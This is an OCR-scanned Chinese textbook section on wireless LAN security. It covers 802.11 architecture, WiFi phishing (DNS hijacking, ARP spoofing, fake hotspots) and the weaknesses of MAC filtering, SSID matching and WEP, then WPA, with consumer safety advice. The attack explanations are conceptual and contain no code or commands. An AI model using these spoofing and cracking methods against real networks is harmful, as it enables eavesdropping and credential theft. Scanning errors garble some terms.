安全 管理 人 员 通 过 设置 过 滤 规 则 和 关键 字 过 滤 出 相关 的 内 容 , 防 止 敏 感 数据 的 泄露 。 
但 是 这 种 方案 也 存在 固有 的 弱点 : 

。 无 法 识别 一 些 特殊 的 网 络 协议 。 

。 无 法 识别 被 用 户 特 殊 处 理 过 的 通信 和 内容, 如 果 恶 意 用 户 对 出 口 的 数据 进行 了 加 密 和 

隐 写 术 处 理 , 便 可 以 轻易 地 穿 透 网 关 。 

。 由 于 要 进行 深度 的 内 容 过 滤 ,设备 性 能 往往 成 为 限制 其 应 用 的 一 个 瓶颈 。 

为 了 保障 信息 安全 ,企业 可 以 设 定 一 些 网 络 安全 政策 ,如 限制 员工 不 能 以 代理 服务 器 上 
网 ,不 能 浏览 广 受 欢迎 的 社交 网 站 ,以 免 黑 客 透 过 漏洞 散播 蠕虫 病毒 。 另 外 ,企业 应 该 定时 
更 新 计算 机 防毒 软件 ,减少 系统 漏洞 , 免 受 黑客 侵袭 。 企 业 还 要 定时 更 换 口 令 密码 ,提高 安 
全 性 。 
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7.4 ”无线 局 域 网 安全 技术 


无 线 局 域 网 (Wireless Local Area Network, WLAN) 可 以 分 为 有 基础 设施 的 无 线 局 域 
网 和 无 基础 设施 的 无 线 局 域 网 两 大 类 ,但 是 我 们 平时 接触 最 多 的 还 是 有 基础 设施 的 WiFi， 
即 基于 IEEE 802. 11 系列 标准 的 WLAN。 

由 于 大 多 数 公 共 场 所 的 免费 WiFi 缺少 安全 防护 措施 ,导致 其 暗藏 风险 ,很 容易 导致 账 
号 密码 被 盗 .个 人 信息 泄露 .网 银 被 盗 刷 、 被 下 载 恶 意 软件 等 严重 后 果 。 下 面 首先 介绍 WiFi 
的 相关 知识 ,然后 介绍 WLAN 的 安全 技术 。 


7.4.1 无 线 局 域 网 概述 


WiFi 允许 在 无 线 局 域 网 络 环境 中 使 用 不 必 授 权 的 2. 4GHz 或 5GHz 射频 波段 进行 无 
线 连接 ,使 智能 终端 设备 实现 随时 、 随 地 、 随 意 的 宽带 网 络 接 入 ,为 用 户 的 接 入 提供 了 极 大 的 
方便 。 表 7. 1 展示 了 几 种 常用 的 IEEE 802. 11 无 线 局 域 网 。 


表 7.1 几 种 常用 的 IEEE 802.11 无 线 局 域 网 





标准 频段 数据 率 物理 层 优 缺点 
IEEE 802.11b ”2.4GHz 最 高 11Mb/s HR-DSSS ”数据 率 较 低 ,价格 最 低 ,信号 传输 距离 
远 , 且 不 易 受 阻碍 


IEEE 802. 11a 5GHz ”最 高 54Mb/s OFDM 数据 率 较 高 ,支持 更 多 用 户 同时 上 网 , 价 
格 最 高 ,信号 传播 距离 较 近 , 易 受阻 碍 

IEEE 802.1lg ”2.4GHz 最 高 54Mb/s OFDM 数据 率 较 高 ,支持 更 多 用 户 同时 上 网 , 信 
号 传输 距离 远 , 且 不 易 受 阻碍 


现在 许多 地 方 , 如 办 公 室 、 机 场 ,快餐 店 等 都 向 公众 提供 有 偿 或 无 偿 接 和 人 WiFi 的 服务 ， 
这 样 的 地 点 就 叫做 热点 。 由 许多 热点 和 AP 连接 起 来 的 区 域 叫做 热 区 (hot zone) 。 现 在 也 
出 现 了 无 线 互 联网 服务 提供 者 (Wireless Internet Service Provider, WISP) 这 一 名 词 。 用 户 
可 以 通过 无 线 信道 接 入 WISP ,继而 接 入 到 互联 网 。 

7.4.1.1 WiFi 系统 组 成 

基于 IEEE 802. 11 的 无 线 局 域 网 的 组 成 如 图 7.7 所 示 。 

IEEE 802. 11 规定 ,无 线 局 域 网 的 最 小 组 成 单位 为 基本 服务 集 ( Basic Service Set， 
BSS) ,一 个 基本 服务 集 包括 一 个 基站 和 若干 个 移动 站 。 

基本 服务 集 内 的 基站 叫做 接 入 点 (Access Point, AP) ,其 作用 与 网 桥 相似 。 网 络 管理 员 
在 安装 AP 时 ,必须 为 该 AP 分 配 一 个 不 超过 32B 的 服务 集 标识 符 (Service Set Identifier， 
SSID) ,并 指定 一 个 信道 。 

一 个 基本 服务 集 可 以 是 孤立 的 ,也 可 以 通过 AP 连接 到 一 个 主干 分 配 系 统 (Distribution 
System,DS) ,然后 再 接 入 到 另 一 个 基本 服务 集 ,构成 扩展 服务 集 (Extended Service Set， 
ESS) 。 主 干 分 配 系统 可 以 采用 以 太 网 ,点 对 点 链 路 或 其 他 无 线 网 络 等 。 

ESS 还 可 以 通过 门户 (portal) 为 无 线 用 户 提供 到 非 IEEE 802. 11 无 线 局 域 网 的 接 入 。 
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IEEE 802.x 


局 域 网 分 配 系统 (DS) 








基本 服务 集 (BSS) 


= 


扩展 服务 集 (ESS) 





图 7.7 IEEE 802. 11 无 线 局 域 网 


门户 的 作用 就 相当 于 一 个 网 桥 。 

一 个 移动 站 如 果 和 希望 加 入 到 一 个 基本 服务 集 , 就 必须 先 选择 一 个 接 入 点 ,并 与 此 接 入 点 
建立 起 关联 。 建 立 关联 就 表示 这 个 移动 站 加 入 了 选 定 的 AP 所 属 的 子 网 。 

移动 站 与 AP 建立 关联 的 方法 包括 以 下 两 种 : 

。 被 动 扫 描 , 即 移动 站 等 待 接收 AP 周期 性 发 出 的 信 标 帧 (beacon frame)。 

。 主动 扫描 , 即 移动 站 主动 发 出 探测 请 求 帧 ,然后 等 待 从 AP 发 回 的 探测 响应 帧 。 

BSS 内 ,所 有 的 移动 站 都 可 以 直接 通信 ,但 在 和 非 本 BSS 内 的 移动 站 通信 时 ,都 要 通过 
所 在 BSS 的 接 入 点 进行 转 接 。 

移动 站 A 从 某 一 个 基本 服务 集 漫游 到 另 一 个 基本 服务 集 的 过 程 中 , 仍 可 以 保持 与 男 一 
个 移动 站 B 的 不 间断 通信 。 

7.4.1.2 IEEE 802.11 协议 

IEEE 802. 11 标准 定义 了 物理 层 和 MAC 层 的 协议 规范 ,协议 栈 如 图 7.8 所 示 。 其 中 
的 物理 层 相 关内 容 见 表 7. 1 。 

无 争 用 服务 











争 用 服务 (必须 实现 ) 













点 协调 功能 (PCF) 














MAC 


分 布 协调 功能 (DCF) 
(CSMA/CA) 





物理 层 





图 7.8 IEEE 802. 11 协议 栈 
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IEEE 802. 11 的 MAC 子 层 支持 两 种 不 同 的 MAC 工作 方式 : 

。 分 布 式 协 调 功 能 (Distributed Coordination Function, DCF) 是 IEEE 802. 11 协议 中 
数据 传输 的 基本 方式 , 即 所 有 要 传输 数据 帧 的 移动 站 竞争 接 入 网 络 。 

。 点 协调 功能 (Point Coordination Function,PCF), 由 接 入 点 AP 控制 的 轮 询 (poll) 方 
式 , 是 一 种 非 竞争 的 工作 方式 ,主要 用 于 传输 实时 业务 。 

其 中 分 布 式 协 调 功 能 直接 位 于 物理 层 之 上 ,其 核心 算法 是 CSMA/CA 技术 ,可 以 作为 

基于 竞争 的 MAC 协议 的 代表 。 
点 协调 功能 架构 在 DCF 之 上 ,是 可 选 的 。 


7.4.2 钓鱼 攻击 的 类 型 与 防范 


所 谓 的 钓鱼 攻击 ,是 指 黑客 伪装 成 正规 的 银行 页 面 或 者 支付 页 面 等 骗取 用 户 输入 账户 
名 和 密码 ,进而 进行 经 济 犯罪 。 

现在 大 部 分 的 WiFi 钓鱼 攻击 采用 以 下 3 种 方式 实现 : DNS 支持 ,ARP 攻击 、 伪 造 
WiFi。 

7.4.2.1 DNS 劫持 

IP 地 址 是 一 串 无 意义 的 数字 (如 202. 119. 64. 123) ,是 为 了 用 于 计算 机 相互 连接 而 设计 
的 。 而 域名 则 更 贴近 自然 语言 ,便于 记忆 和 沟通 ,用 于 人 与 人 之 间 的 交流 ,如 www. nuaa. 
edu. cn, 只 要 记 住 nuaa 是 南京 航空 航天 大 学 的 简写 , 即 可 轻松 地 记 住 这 串 地 址 。 

而 DNS( 域 名 服务 系统 ) 提 供 了 将 域名 转换 为 IP 地 址 的 服务 。 例 如 , 当 你 在 浏览 器 地 
址 栏 输入 http://www. nuaa. edu. cn 并 按 下 回 车 键 时 ,DNS 会 自动 将 www. nuaa. edu. cn 
转换 为 诸如 http://202. 119. 64. 123/ 的 IP 地 址 形式 。 

但 是 ,DNS 的 这 个 映射 过 程 可 能 会 被 攻击 者 所 支持 ,使 得 用 户 无 法 将 请 求 报 文 发 送 给 
正确 的 DNS 服务 器 ,而 是 发 给 了 一 个 假 的 DNS 服务 器 ,返回 一 个 假 的 IP 地 址 ,继而 进行 后 
续 的 操作 ,完成 攻击 的 目的 。 

DNS 劫持 原理 如 图 7.9 所 示 。 


0 发 送 域名 
上 获取 IP 


正常 服务 器 
































段 服务 
(a) 正常 的 DNS 服 务 (b) 被 劫持 的 DNS 服务 


图 7.9 DNS 支持 示意 图 
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DNS 支持 强制 修改 了 原 有 的 二 域名 ,IP 地 址 二 的 映射 关系 ,将 所 访问 的 网 站 域名 强行 
改 为 黑客 自己 的 IP 地 址 ,并 伪造 一 个 服务 网 站 。 这 样 ,在 用 户 上 网 时 ,即使 域名 是 正确 的 ， 
也 会 打开 黑客 精心 伪造 的 假 网 站 ,并 将 自己 的 账号 密码 全 都 发 给 了 黑客 。 另 外 ,黑客 也 可 能 
会 通过 跳 转 的 方式 达到 相同 的 结果 。 

例如 ,南京 市 内 的 所 有 A 快递 都 需要 经 过 南京 市 A 公司 集散 中 心 进 行 中 转 ,而 如 果 劫 
菲 将 集散 中 心 劫持 了 ,强制 将 所 有 快递 的 收 货 地 址 改 成 动 菲 家 ,这 样 ,所 有 用 户 网 购 的 快递 
就 都 寄 往 动 菲 家 了 。 

7.4.2.2 ARP 攻击 

即使 DNS 没有 被 支持 ,域名 成 功 转换 为 合法 的 IP 地 址 ,之 后 还 必须 完成 从 IP 地 址 转 
换 到 服务 器 的 MAC 地 址 的 操作 (假设 客户 和 服务 器 在 同一 个 网 络 里 面 ,如 果 不 在 同一 个 网 
络 , 则 以 路 由 器 的 MAC 地 址 来 代替 服务 器 的 MAC 地 址 ) ,也 就 是 必须 从 IP 地 址 转换 到 物 
理 网 络 所 承认 的 地 址 ,这 样 用 户 发 出 的 消息 才能 被 服务 器 收 到 并 处 理 。 

执行 从 IP 地 址 映射 到 MAC 地 址 的 协议 是 ARP 协议 ,该 协议 的 原理 非常 简单 ,其 工作 
原理 如 图 7. 10 所 示 : 源 主机 A( 例 如 它 是 客户 端 所 在 的 主机 ) 在 子 网 中 广播 一 个 ARP 请 
求 ,而 目的 主机 B( 例 如 它 是 服务 器 ) 收 到 该 请 求 后 ,回复 一 个 ARP 响应 给 A, 此 后 A 就 知 
道 B 的 MAC 地 址 了 。 






我 是 209.0.0.5， 硬 件 地 址 是 00-00-C0-15-AD-18， 
我 想 知道 主机 209.0.0.6 的 MAC 地 址 

















ARP 请 求 ARP 请 求 ARP 请 求 ARP 请 求 
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(a) 主机 A 广播 发 送 ARP 请 求 分 组 





我 是 209.0.0.6， 硬 件 地 址 是 
08-00-2B-00-EE-0A 













ARPl 向 应 














209.0.0.6 
209.0.0.5 [ 
[1 x 4 [OyY 1 Cz 
00-00-C0-15-AD-18 08-00-2B-00-EE-OA 


(b) 主机 B 向 A 发 送 ARP 响 应 分 组 
图 7.10 ARP 协议 工作 原理 图 


ARP 这 种 简单 的 工作 方式 导致 了 ARP 较 容易 被 黑客 进行 攻击 。ARP 攻击 就 是 强制 
修改 了 局 域 网 内 的 这 个 映射 关系 ,将 所 有 IP 地 址 本 来 对 应 的 MAC 地 址 强制 改 为 黑客 自己 
计算 机 的 MAC 地 址 ,并 伪造 一 个 用 户 需要 访问 的 网 站 。 用 户 上 网 时 ,即使 目的 主机 的 域名 
和 对 应 的 IP 地 址 都 是 正确 的 ,但 因为 最 后 发 送 帧 的 目的 MAC 地 址 错 了 ,也 只 能 打开 黑客 
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精心 伪造 的 假 网 站 。 

以 快递 为 例 ,虽然 没有 动 菲 动 持 A 集散 中 心 ,但 是 坏人 却 伪装 成 收 件 人 X, 给 客服 打 电 
话说 :“ 我 才 是 X, 寄 件 地 址 改 了 !1” 这 样 一 来 ,虽然 快递 也 被 寄 到 了 A 集散 中 心 , 却 在 半路 被 
改 成 了 坏人 的 地 址 ,因此 快递 员 就 将 快递 发 送 到 了 坏人 那里 。 

7.4.2.3 伪造 WiFi 


伪造 WiFi 就 是 黑客 自行 搭建 的 山寨 WiFi 陷阱 ,黑客 只 需 一 台 计算 机 、 一 套 无 线路 由 
器 以 及 一 个 网 络 分 析 软 件 , 便 可 搭建 与 公共 WiFi 名 称 很 相近 的 WiFi 热点 。 

最 简单 的 情况 是 ,一 台 计 算 机 被 设置 成 WiFi 路 由 器 ,一 般 不 设 登录 密码 ,诱惑 用 户 连 
接 。 而 当 用 户 使 用 他 们 搭建 的 WiFi 时 ,所 有 的 数据 都 要 经 过 这 人 台 计 算 机 才能 连接 到 真正 
的 因特网 上 ,黑客 就 可 以 用 软件 对 手机 里 传输 的 数据 (例如 用 户 在 手机 或 者 移动 终端 上 浏览 
了 哪些 网 站 ,这 些 网 站 又 给 用 户 回复 了 哪些 数据 ,比如 文字 图片 等 ,以 及 用 户 登录 时 的 用 户 
名 、 密 码 等 ) 进 行 监控 和 复制 ,然后 利用 专门 的 软件 破译 ,就 能 轻而易举 地 查 到 用 户 的 个 人 隐 
私 。 另 外 ,黑客 还 可 以 向 用 户 手机 内 传输 恶性 插件 。 

某 市 民 张 先生 在 某 超市 门 前 等 人 ,手机 上 跳出 了 一 个 名 为 "SHOP WI-FI” 的 无 线 网 络 ， 
连 上 该 网 络 后 居然 能 免费 上 网 ! 但 是 , 令 他 意 想 不 到 的 是 , 连 上 了 这 一 免费 WiFi 后 ,手机 
竞 然 进入 了 自动 下 载 模式 ,两 个 名 为 “天 天 机 车 ”和 “全 民 泡 泡 ” 的 游戏 软件 便 自动 地 安装 到 
了 他 的 手机 上 。 张 先生 由 于 好 奇 , 便 点 进 了 这 两 款 游戏 准备 试 玩 ,然而 刚 点 进去 ,手机 便 跳 
出 了 一 条 短信 :“ 你 已 经 成 功 订阅 了 某 某 网 络 公司 提供 的 增值 服务 ,月 服务 费 30 元 。” 张 先 
生 只 是 点 了 进去 就 被 扣 费 了 ,随即 删除 了 这 两 款 游 戏 ,可 仅仅 过 了 半 个 小 时 ,这 两 款 游戏 又 
自动 出 现在 了 他 的 手机 屏幕 上 ,始终 无 法 删除 。 

通常 ,防止 这 种 攻击 最 简单 的 方法 就 是 不 要 贪小 便宜 ,杜绝 蹦 网 行为 ,不 需要 验证 、 不 需 
要 密码 的 公共 WiFi 风险 系数 很 高 。 特 别 需 要 注意 警惕 那些 重 名 的 WiFi, 如 果 发 现 多 个 重 
名 WiFi 时 ,要 格外 警惕 。 

用 户 应 尽量 连接 可 靠 的 热点 ,例如 由 政府 支持 运营 ,用 户 必 须 通过 验证 才能 使 用 的 , 且 
公安 部 门 也 会 全 天 候 监控 的 热点 ,以 及 由 专业 的 、 大 的 电信 公司 /运营 商 提 供 的 热点 ,这 些 热 
点 由 电信 技术 部 门 运营 监控 ,黑客 很 难 攻破 。 更 重要 的 是 尽量 不 要 用 免费 WiFi 进行 网 银 、 
支付 宝 等 涉及 财务 的 操作 ,必须 进行 此 类 操作 时 ,专门 的 应 用 软件 客户 端的 安全 性 高 于 第 三 
方 浏览 器 。 或 者 ,在 执行 此 类 高 安全 性 要 求 的 操作 时 ,在 不 确定 绝对 安全 的 WiFi 下 ,最 好 
关闭 WiFi, 通 过 数据 网 络 进 行 操作 ,保障 资金 安全 。 

用 户 在 发 现 自己 的 话费 被 异常 扣 费 后 ,应 立刻 致电 运营 商 客服 热线 , 问 清楚 扣 费 的 原 
因 。 在 确认 是 吸 费 软件 作 崇 后 ,应 要 求 运 营 商 关 闭 扣 费 软件 的 相关 功能 。 用 户 的 手机 内 应 
下 载 防止 扣 费 的 安全 软件 ,安全 软件 可 以 对 交互 的 数据 包 进 行 加 密 传 输 ,即使 黑客 劫持 数据 
包 , 由 于 有 加 密 程 序 , 黑 客 也 很 难 从 中 获取 有 效 信息 。 


7.4.3 ”WLAN 的 安全 防护 


WLAN 的 安全 防护 主要 是 指 考虑 网 络 本 身 的 安全 性 。 在 IEEE 802. 11 中 考虑 了 无 线 
局 域 网 的 接 人 安全 问题 ,并 提供 了 一 些 身份 认证 技术 .数据 加 密 与 完整 性 验证 机 制 。 

身份 认证 应 当 包括 两 个 方面 ,一 是 验证 信息 的 发 送 者 和 接收 者 是 否 合法 , 即 包括 对 信 
源 、 信 宿 的 认证 ; 二 是 验证 消息 的 完整 性 。 认 证 技术 主要 用 来 防止 主动 攻击 ,这 对 于 在 开放 
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环境 中 的 信息 系统 的 安全 性 尤为 重要 。IEEE 802. 11 标准 中 的 身份 认证 只 能 用 来 对 无 线 终 
端 或 设备 进行 认证 ,并 不 对 用 户 进行 认证 。 具 体 的 认证 方式 有 以 下 几 种 : 

。 无 线 网 卡 物理 地 址 (MAC) 过 滤 。 

。 服务 区 标识 符 匹配 。 

。 有 线 等 效 保密 (Wired Equivalent Privacy, WEP) 协 议 。 

。 WiFi 网 络 安全 接 人 (WiFi Protected Access,WPA) 。 

。 WAPI 安全 技术 。 

。 其 他 。 

7.4.3.1 无 线 网 卡 物理 地 址 过 滤 

每 个 无 线 工 作 站 的 网 卡 都 由 唯一 的 物理 地 址 标识 ,该 物理 地 址 编码 方式 类 似 于 以 太 网 
的 物理 地 址 (48 位 )。 最 简单 的 安全 措施 是 网 络 管理 员 在 无 线 局 域 网 访问 点 中 手工 维护 一 
组 允许 访问 或 不 允许 访问 的 MAC 地 址 列表 ,以 实现 物理 地 址 的 访问 过 滤 。 

如 果 企 业 中 的 AP 数量 太 多 ,为 了 实现 整个 企业 中 所 有 AP 都 可 以 进行 统一 的 无 线 网 
卡 MAC 地 址 认证 , 则 AP 需要 支持 无 线 网 卡 MAC 地 址 的 集中 RADIUS 认证 。 

虽然 无 线 网 络 应 用 方面 提供 了 MAC 地 址 过 滤 的 功能 ,很 多 用 户 也 确实 使 用 该 功能 保 
护 无 线 网 络 安全 ,但 是 由 于 MAC 地 址 是 可 以 随意 修改 的 ,通过 注册 表 或 网 卡 属性 都 可 以 伪 
造 MAC 地 址 信息 。 所 以 当 通过 Sniffer 等 工具 查找 到 有 访问 权限 的 MAC 地 址 信息 后 ,还 
是 可 以 伪造 MAC 地 址 ,从 而 让 MAC 地 址 过 滤 功 能 形同虚设 。 

7.4.3.2 服务 区 标识 符 匹 配 

每 个 无 线 AP 都 有 一 个 扩展 服务 集 标识 (Extended Service Set Identifier, ESSID)。 在 
该 措施 下 ,无 线 工 作 站 必须 出 示 正 确 的 ESSID, 如 果 与 AP 的 SSID 相同 才能 访问 AP。 如 
果 出 示 的 SSID 与 AP 的 SSID 不 同 ,那么 AP 将 拒绝 无 线 工作 站 通过 本 服务 区 上 网 。 因 此 
可 以 认为 SSID 是 一 个 简单 的 口令 ,从 而 提供 口令 认证 机 制 ,实现 一 定 的 安全 。 

但 是 ,如 果 无 线 网 卡 的 ESSID 设 定 为 “ANY” 时 (这 是 目前 绝 大 多 数 无 线 网 卡 、 无 线 AP 
的 默认 ESSID 标识 ), 它 就 能 自动 搜寻 在 信号 范围 内 所 有 的 接 入 点 ,发 现 其 ESSID, 然 后 在 
试图 建立 连接 时 将 自己 的 ESSID 设置 为 与 AP 的 ESSID 相同 ,因此 ,这 一 道 防线 经 常 是 形 
同 虚设 。 如 果 和 希望 无 线 局 域 网 接 入 点 AP 对 此 项 技术 进行 支持 ,就 必须 避免 AP 广播 其 
ESSID 号 ,这样 无 线 工作 站 端 就 必须 主动 提供 正确 的 ESSID 号 才能 与 AP 进行 关联 ,进而 
上 网 。 

7.4.3.3 ”有 线 等 效 保密 协 议 

由 于 无 线 局 域 网 通过 无 线 电 波 传输 .因此 容易 受到 攻击 和 干扰 。 链 路 层 加 密 是 在 接 入 
时 采用 加 密 的 方法 传输 数据 ,从 而 限制 不 知道 密 钥 的 用 户 与 AP 间 的 通信 。1999 年 9 月 通 
过 的 IEEE 802. 11 标准 中 提供 了 有 线 等 效 保密 协议 。WEP 对 在 两 台 设备 间 无 线 传输 的 数 
据 进 行 加 密 , 用 以 防止 非法 用 户 窃听 或 侵入 无 线 网 络 。 

WEP 加 密 机 制 采用 的 是 RSA 数据 安全 公司 开发 的 对 称 性 的 RC4(Rivest Cipher) 加 密 
算法 ,在 加 密 、 解 密 端 均 使 用 相同 的 40 位 密 钥 。 密 钥 被 保存 在 每 一 个 客户 端 及 AP 中 ,所 有 
客户 端 和 AP 在 发 送 与 接收 资料 时 都 使 用 这 把 共享 密 钥 (share key) 来 完成 加 密 和 解密 。 
WEP 使 用 RC4 保证 数据 的 加 密 传 输 ,并 使 用 循环 元 余 校 验 码 (CRC-32) 来 验证 传输 数据 的 
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正确 性 。WEP 对 无 线 终端 或 设备 提供 了 两 种 认证 方式 : 开放 系统 认证 (open system 
authentication) 和 共享 密 钥 认证 (shared key authentication ) 。 

1. 开放 系统 认证 

开放 系统 认证 使 用 明文 传输 ,包括 两 个 步骤 : 

(1) 发 起 认证 的 STA(Station) 发 送 管理 帧 ,表明 自己 的 身份 并 提出 认证 请 求 。 

(2) 负责 认证 的 AP 对 STA 作出 响应 。 

由 于 采用 明文 传输 认证 数据 ,开放 系统 认证 的 过 程 本 身 就 容易 被 窃听 ,因此 安全 性 较 
低 , 实 际 系统 中 很 少 采 用 。 

2. 共享 密 钥 认证 

共享 密 钥 认证 包括 4 个 步骤 ,使 用 经 WEP 加 密 的 密 文 传输 : 

(1) 发 起 认证 的 STA 发 送 一 个 管理 帧 表明 自己 的 身份 并 提出 认证 请 求 。 

(2) AP 响应 ,响应 帧 中 包含 由 WEP 加 密 算 法 产生 的 随机 信息 。 

(3) STA 对 随机 信息 用 共享 密 钥 加 密 , 并 发 送 该 加 密 信息 给 AP。 

(4) AP 对 无 线 客 户 端的 加 密 结果 进行 解密 ,并 返回 认证 结果 。 

综 上 所 述 , 共 享 密 钥 认证 的 安全 性 高 于 开放 系统 认证 ,但 是 就 目前 的 技术 而 言 , 共 享 密 
钥 认 证 的 安全 性 并 不 高 。 

由 于 在 起 草 WEP 标准 时 ,美国 政府 在 加 密 技 术 的 输出 限制 中 限制 了 密 钥 的 长 度 , 因 
此 ,标准 的 64 位 WEP 使 用 40 位 密 钥 加 24 位 的 初始 向 量 (initialization vector,IV) 作 为 
RC4 的 密 钥 。 在 限制 放宽 之 后 ,主要 厂家 都 用 104 位 的 密 钥 加 24 位 的 初始 向 量 形成 128 位 
的 WEP 密 钥 。 

RC4 是 一 种 流 式 加 密 算法 , 即 同一 个 密 钥 绝 不 能 使 用 两 次 ,所 以 使 用 (虽然 是 用 明文 传 
送 的 )IV 的 目的 是 要 避免 重复 ; 但 24 位 的 IV 不 能 保证 不 会 重复 ,而 且 IV 的 使 用 方式 也 可 
能 使 其 遭受 到 关联 式 的 密 钥 攻击 。 

许多 WEP 系统 要 求 密 钥 用 十 六 进 制 格式 指定 ,有 些 用 户 会 选择 在 0~~9、A~F 的 十 六 
进 制 字符 集中 可 以 拼 成 英文 词 的 密 钥 ,如 GOOD CODE SITE 等 ,这 种 密 钥 很 容易 被 猜 
出 来 。 

密 钥 长 度 还 不 是 WEP 存在 安全 性 问题 的 主要 因素 .破解 较 长 的 密 钥 需 要 拦截 较 多 的 
数据 包 , 但 WEP 中 IV 雷同 的 可 能 性 较 高 ,导致 长 密 钥 根 本 发 挥 不 了 作用 。 

2001 年 8 月 ,Fluhrer 等 人 发 表 了 针对 WEP 的 密码 分 析 , 利 用 RC4 加 解密 和 IV 的 使 
用 方式 的 特性 ,在 网 络 上 偷 听 几 个 小 时 后 ,就 可 以 把 RC4 的 密 钥 破解 出 来 。 这 个 攻击 方式 
很 快 就 被 实现 ,并 且 出 现 了 自动 化 的 破解 工具 ,用 个 人 计算 机 和 免费 软件 就 能 进行 这 种 
攻击 。 

虽然 WEP 存在 弱点 ,但 也 有 一 定 的 保密 作用 。 而 在 WLAN 中 ,WEP 不 是 强制 使 用 
的 ,因此 许多 无 线 设施 根本 就 没有 启动 WEP。 另 外 ,WEP 中 并 不 包含 密 钥 的 管理 协定 , 因 
此 在 用 户 间 共享 一 个 秘密 密 钥 完全 是 用 户 级 的 行为 ,没有 系统 的 安全 保障 。Cam-Winget 
等 人 (2003) 认 为 ,只 要 有 合适 的 仪器 ,就 可 以 在 一 英里 (1852m) 之 外 或 更 远 的 地 方 窃听 到 由 
WEP 保护 的 网 络 。 而 2005 年 ,美国 联邦 调查 局 的 一 个 小 组 展示 了 用 公开 可 得 的 工具 在 
3min 内 就 破解 了 一 个 用 WEP 保护 的 网 络 。 
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WEP 加 密 采 用 静态 的 保密 密 钥 ,各 WLAN 终端 使 用 相同 的 密 钥 访问 无 线 网 络 。WEP 
也 提供 认证 功能 , 当 加 密 机 制 功能 启用 ,客户 端 尝 试 连接 上 AP 时 ,AP 会 发 出 一 个 
Challenge Packet 给 客户 端 ,客户 端 再 利用 持 有 的 密 钥 将 此 加 密 后 送 回 AP 以 进行 认证 比 
对 ,只 有 正确 无 误 , 才 能 获准 存 取 网 络 的 资源 。 
40 位 WEP 具有 很 好 的 互 操作 性 ,所 有 通过 WiFi 组 织 认 证 的 产品 都 可 以 实现 WEP 互 
操作 。 现 在 的 WEP 一 般 也 支持 128 位 的 密 钥 ,提供 更 高 等 级 的 安全 加 密 。 
从 理论 上 说 ,要 想 破 解 128 位 密 钥 ,窃听 者 或 攻击 者 需要 对 数 百 亿 个 可 能 的 密码 逐一 进 
行 试 算 , 因 此 破解 几乎 是 不 可 能 的 。 不 幸 的 是 ,由 于 RC4 加 密 算法 本 身 的 设计 缺陷 ,窃听 者 
其 实 只 需要 试 算 几 百 万 个 密 钥 就 很 容易 得 手 。 随 着 计算 技术 的 不 断 提 高 ,窃听 者 破解 密 钥 
的 能 力也 在 提高 ,目前 ,只 需要 截获 几 百 万 个 数据 包 便 可 接 入 一 个 WLAN。 
7.4.3.4 ”WiFi 网络 安全 接 入 
攻击 者 攻击 WLAN 一 般 采 用 两 种 方式 : 
。 主动 进攻 方式 。 攻 击 者 从 WLAN 之 外 向 已 接 入 该 WLAN 的 某 个 已 知 用 户 发 送 一 
条 信息 (例如 通过 有 线 互 联网 给 某 个 WLAN 用 户 发 送 电子 邮件 ), 然 后 通过 比较 加 
密 前 和 加 密 后 的 数据 包 , 便 可 获得 该 用 户 的 密 钥 。 这 种 攻击 比较 容易 被 检测 到 ,从 
而 暴露 攻击 者 所 在 的 地 点 (因为 攻击 者 必须 在 距离 无 线 接 人 点 较 近 的 地 方 进行 监听 
才 有 可 能 ) 。 

。 被 动 进攻 方式 。 攻 击 者 只 需要 被 动 接收 无 线 信号 即 可 。 因 为 他 们 很 熟悉 各 种 常用 
网 络 传输 协议 (这 些 协 议 往往 不 对 信息 传输 进行 加 密 ) 以 及 对 应 的 数据 包 格 式 , 因 此 
只 需要 将 这 些 信 息 与 加 密 信息 进 行 比 较 就 能 获得 密 钥 。 

为 了 解决 针对 WLAN 的 这 些 安全 问题 , WiFi 设计 出 了 全 新 的 安全 系统 WPA, 这 套 安 
全 解决 方案 最 后 被 集成 进 IEEE 802. 11i 协议 体系 中 ,专门 针对 WEP 的 安全 缺陷 。WPA 
是 一 种 基于 标准 的 可 互 操作 的 WLAN 安全 性 增强 解决 方案 ,可 增强 现 有 以 及 未 来 无 线 局 
域 网 系统 的 数据 保护 和 访问 控制 水 平 。 

WPA 于 2003 年 制定 ,并 保持 与 IEEE 802. 11 标准 的 前 向 兼容 。 完 整 的 IEEE 802. 11i 
标准 在 2004 年 6 月 通过 ,对 应 安全 性 解决 方案 升级 为 WPA2。WPA 和 WPA2 的 安全 性 主 
要 体现 在 身份 认证 .加密 机 制 和 数据 包 检 查 等 方面 ,而 且 还 提升 了 无 线 网 络 的 管理 能 力 。 只 
要 部 署 适当 ,WPA 可 保证 WLAN 用 户 的 数据 受到 保护 ,并 且 只 有 授权 的 网 络 用 户 才 可 以 
访问 WLAN 网 络 。 

IEEE 802. 11i 的 协议 体系 结构 如 图 7. 11 所 示 。 





可 扩展 认证 协议 (EAP) 





IEEE 802.1x 接 口 访问 机 制 


临时 密 钥 完整 性 协议 ”| 计数 器 模式 密码 块 链 消息 | 无 线 健壮 安全 认证 协议 
(TKIP) 完整 码 协议 (CCMP) (WRAP) 




















图 7.11 IEEE 802. 11i 协 议 体系 


IEEE 802. 11i 协议 体系 按照 功能 划分 为 3 层 。 最 上 层 为 可 扩展 认证 协议 (Extensible 
Authentication Protocol,EAP) ,对 用 户 的 接 入 进行 认证 就 是 基于 EAP 的 各 种 认证 协议 来 
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完成 的 。 其 中 EAP-TLS 协议 是 对 AP 和 客户 端 所 拥有 的 数字 证 书 进行 双向 认证 的 协议 ， 
该 技术 也 是 用 于 无 线 局 域 网 的 一 种 增强 性 网 络 安全 解决 方案 。 当 无 线 工作 站 与 AP 关联 
后 ,是 否 可 以 使 用 AP 的 服务 要 取决 于 IEEE 802. 1x 的 认证 结果 。 如 果 认 证 通过 , 则 AP 为 
无 线 工 作 站 打开 这 个 逻辑 端口 ,否则 不 允许 用 户 上 网 。 
WPA 目前 有 4 种 认证 方式 : 
。 WPA。 又 叫做 WPA 企业 版 ,是 用 来 替代 WEP 的 机 制 , 它 继承 了 WEP 的 基本 原理 
而 又 弥补 了 WEP 的 缺点 。 该 方式 使 用 IEEE 802. 1x 协议 进行 认证 ,这 种 方式 需要 
一 个 认证 服务 器 ,定期 为 每 台 移动 客户 机 生成 唯一 的 加 密 密 钥 ,并 发 布 给 各 个 用 户 。 
WPA 加 强 了 生成 加 密 密 钥 的 算法 ,因此 即便 收集 到 分 组 信息 并 对 其 进行 解析 ,也 几 
乎 无 法 计算 出 通用 密 钥 ， WPA 中 还 增加 了 防止 数据 中 途 被 自 改 的 功能 和 认证 
功能 。 
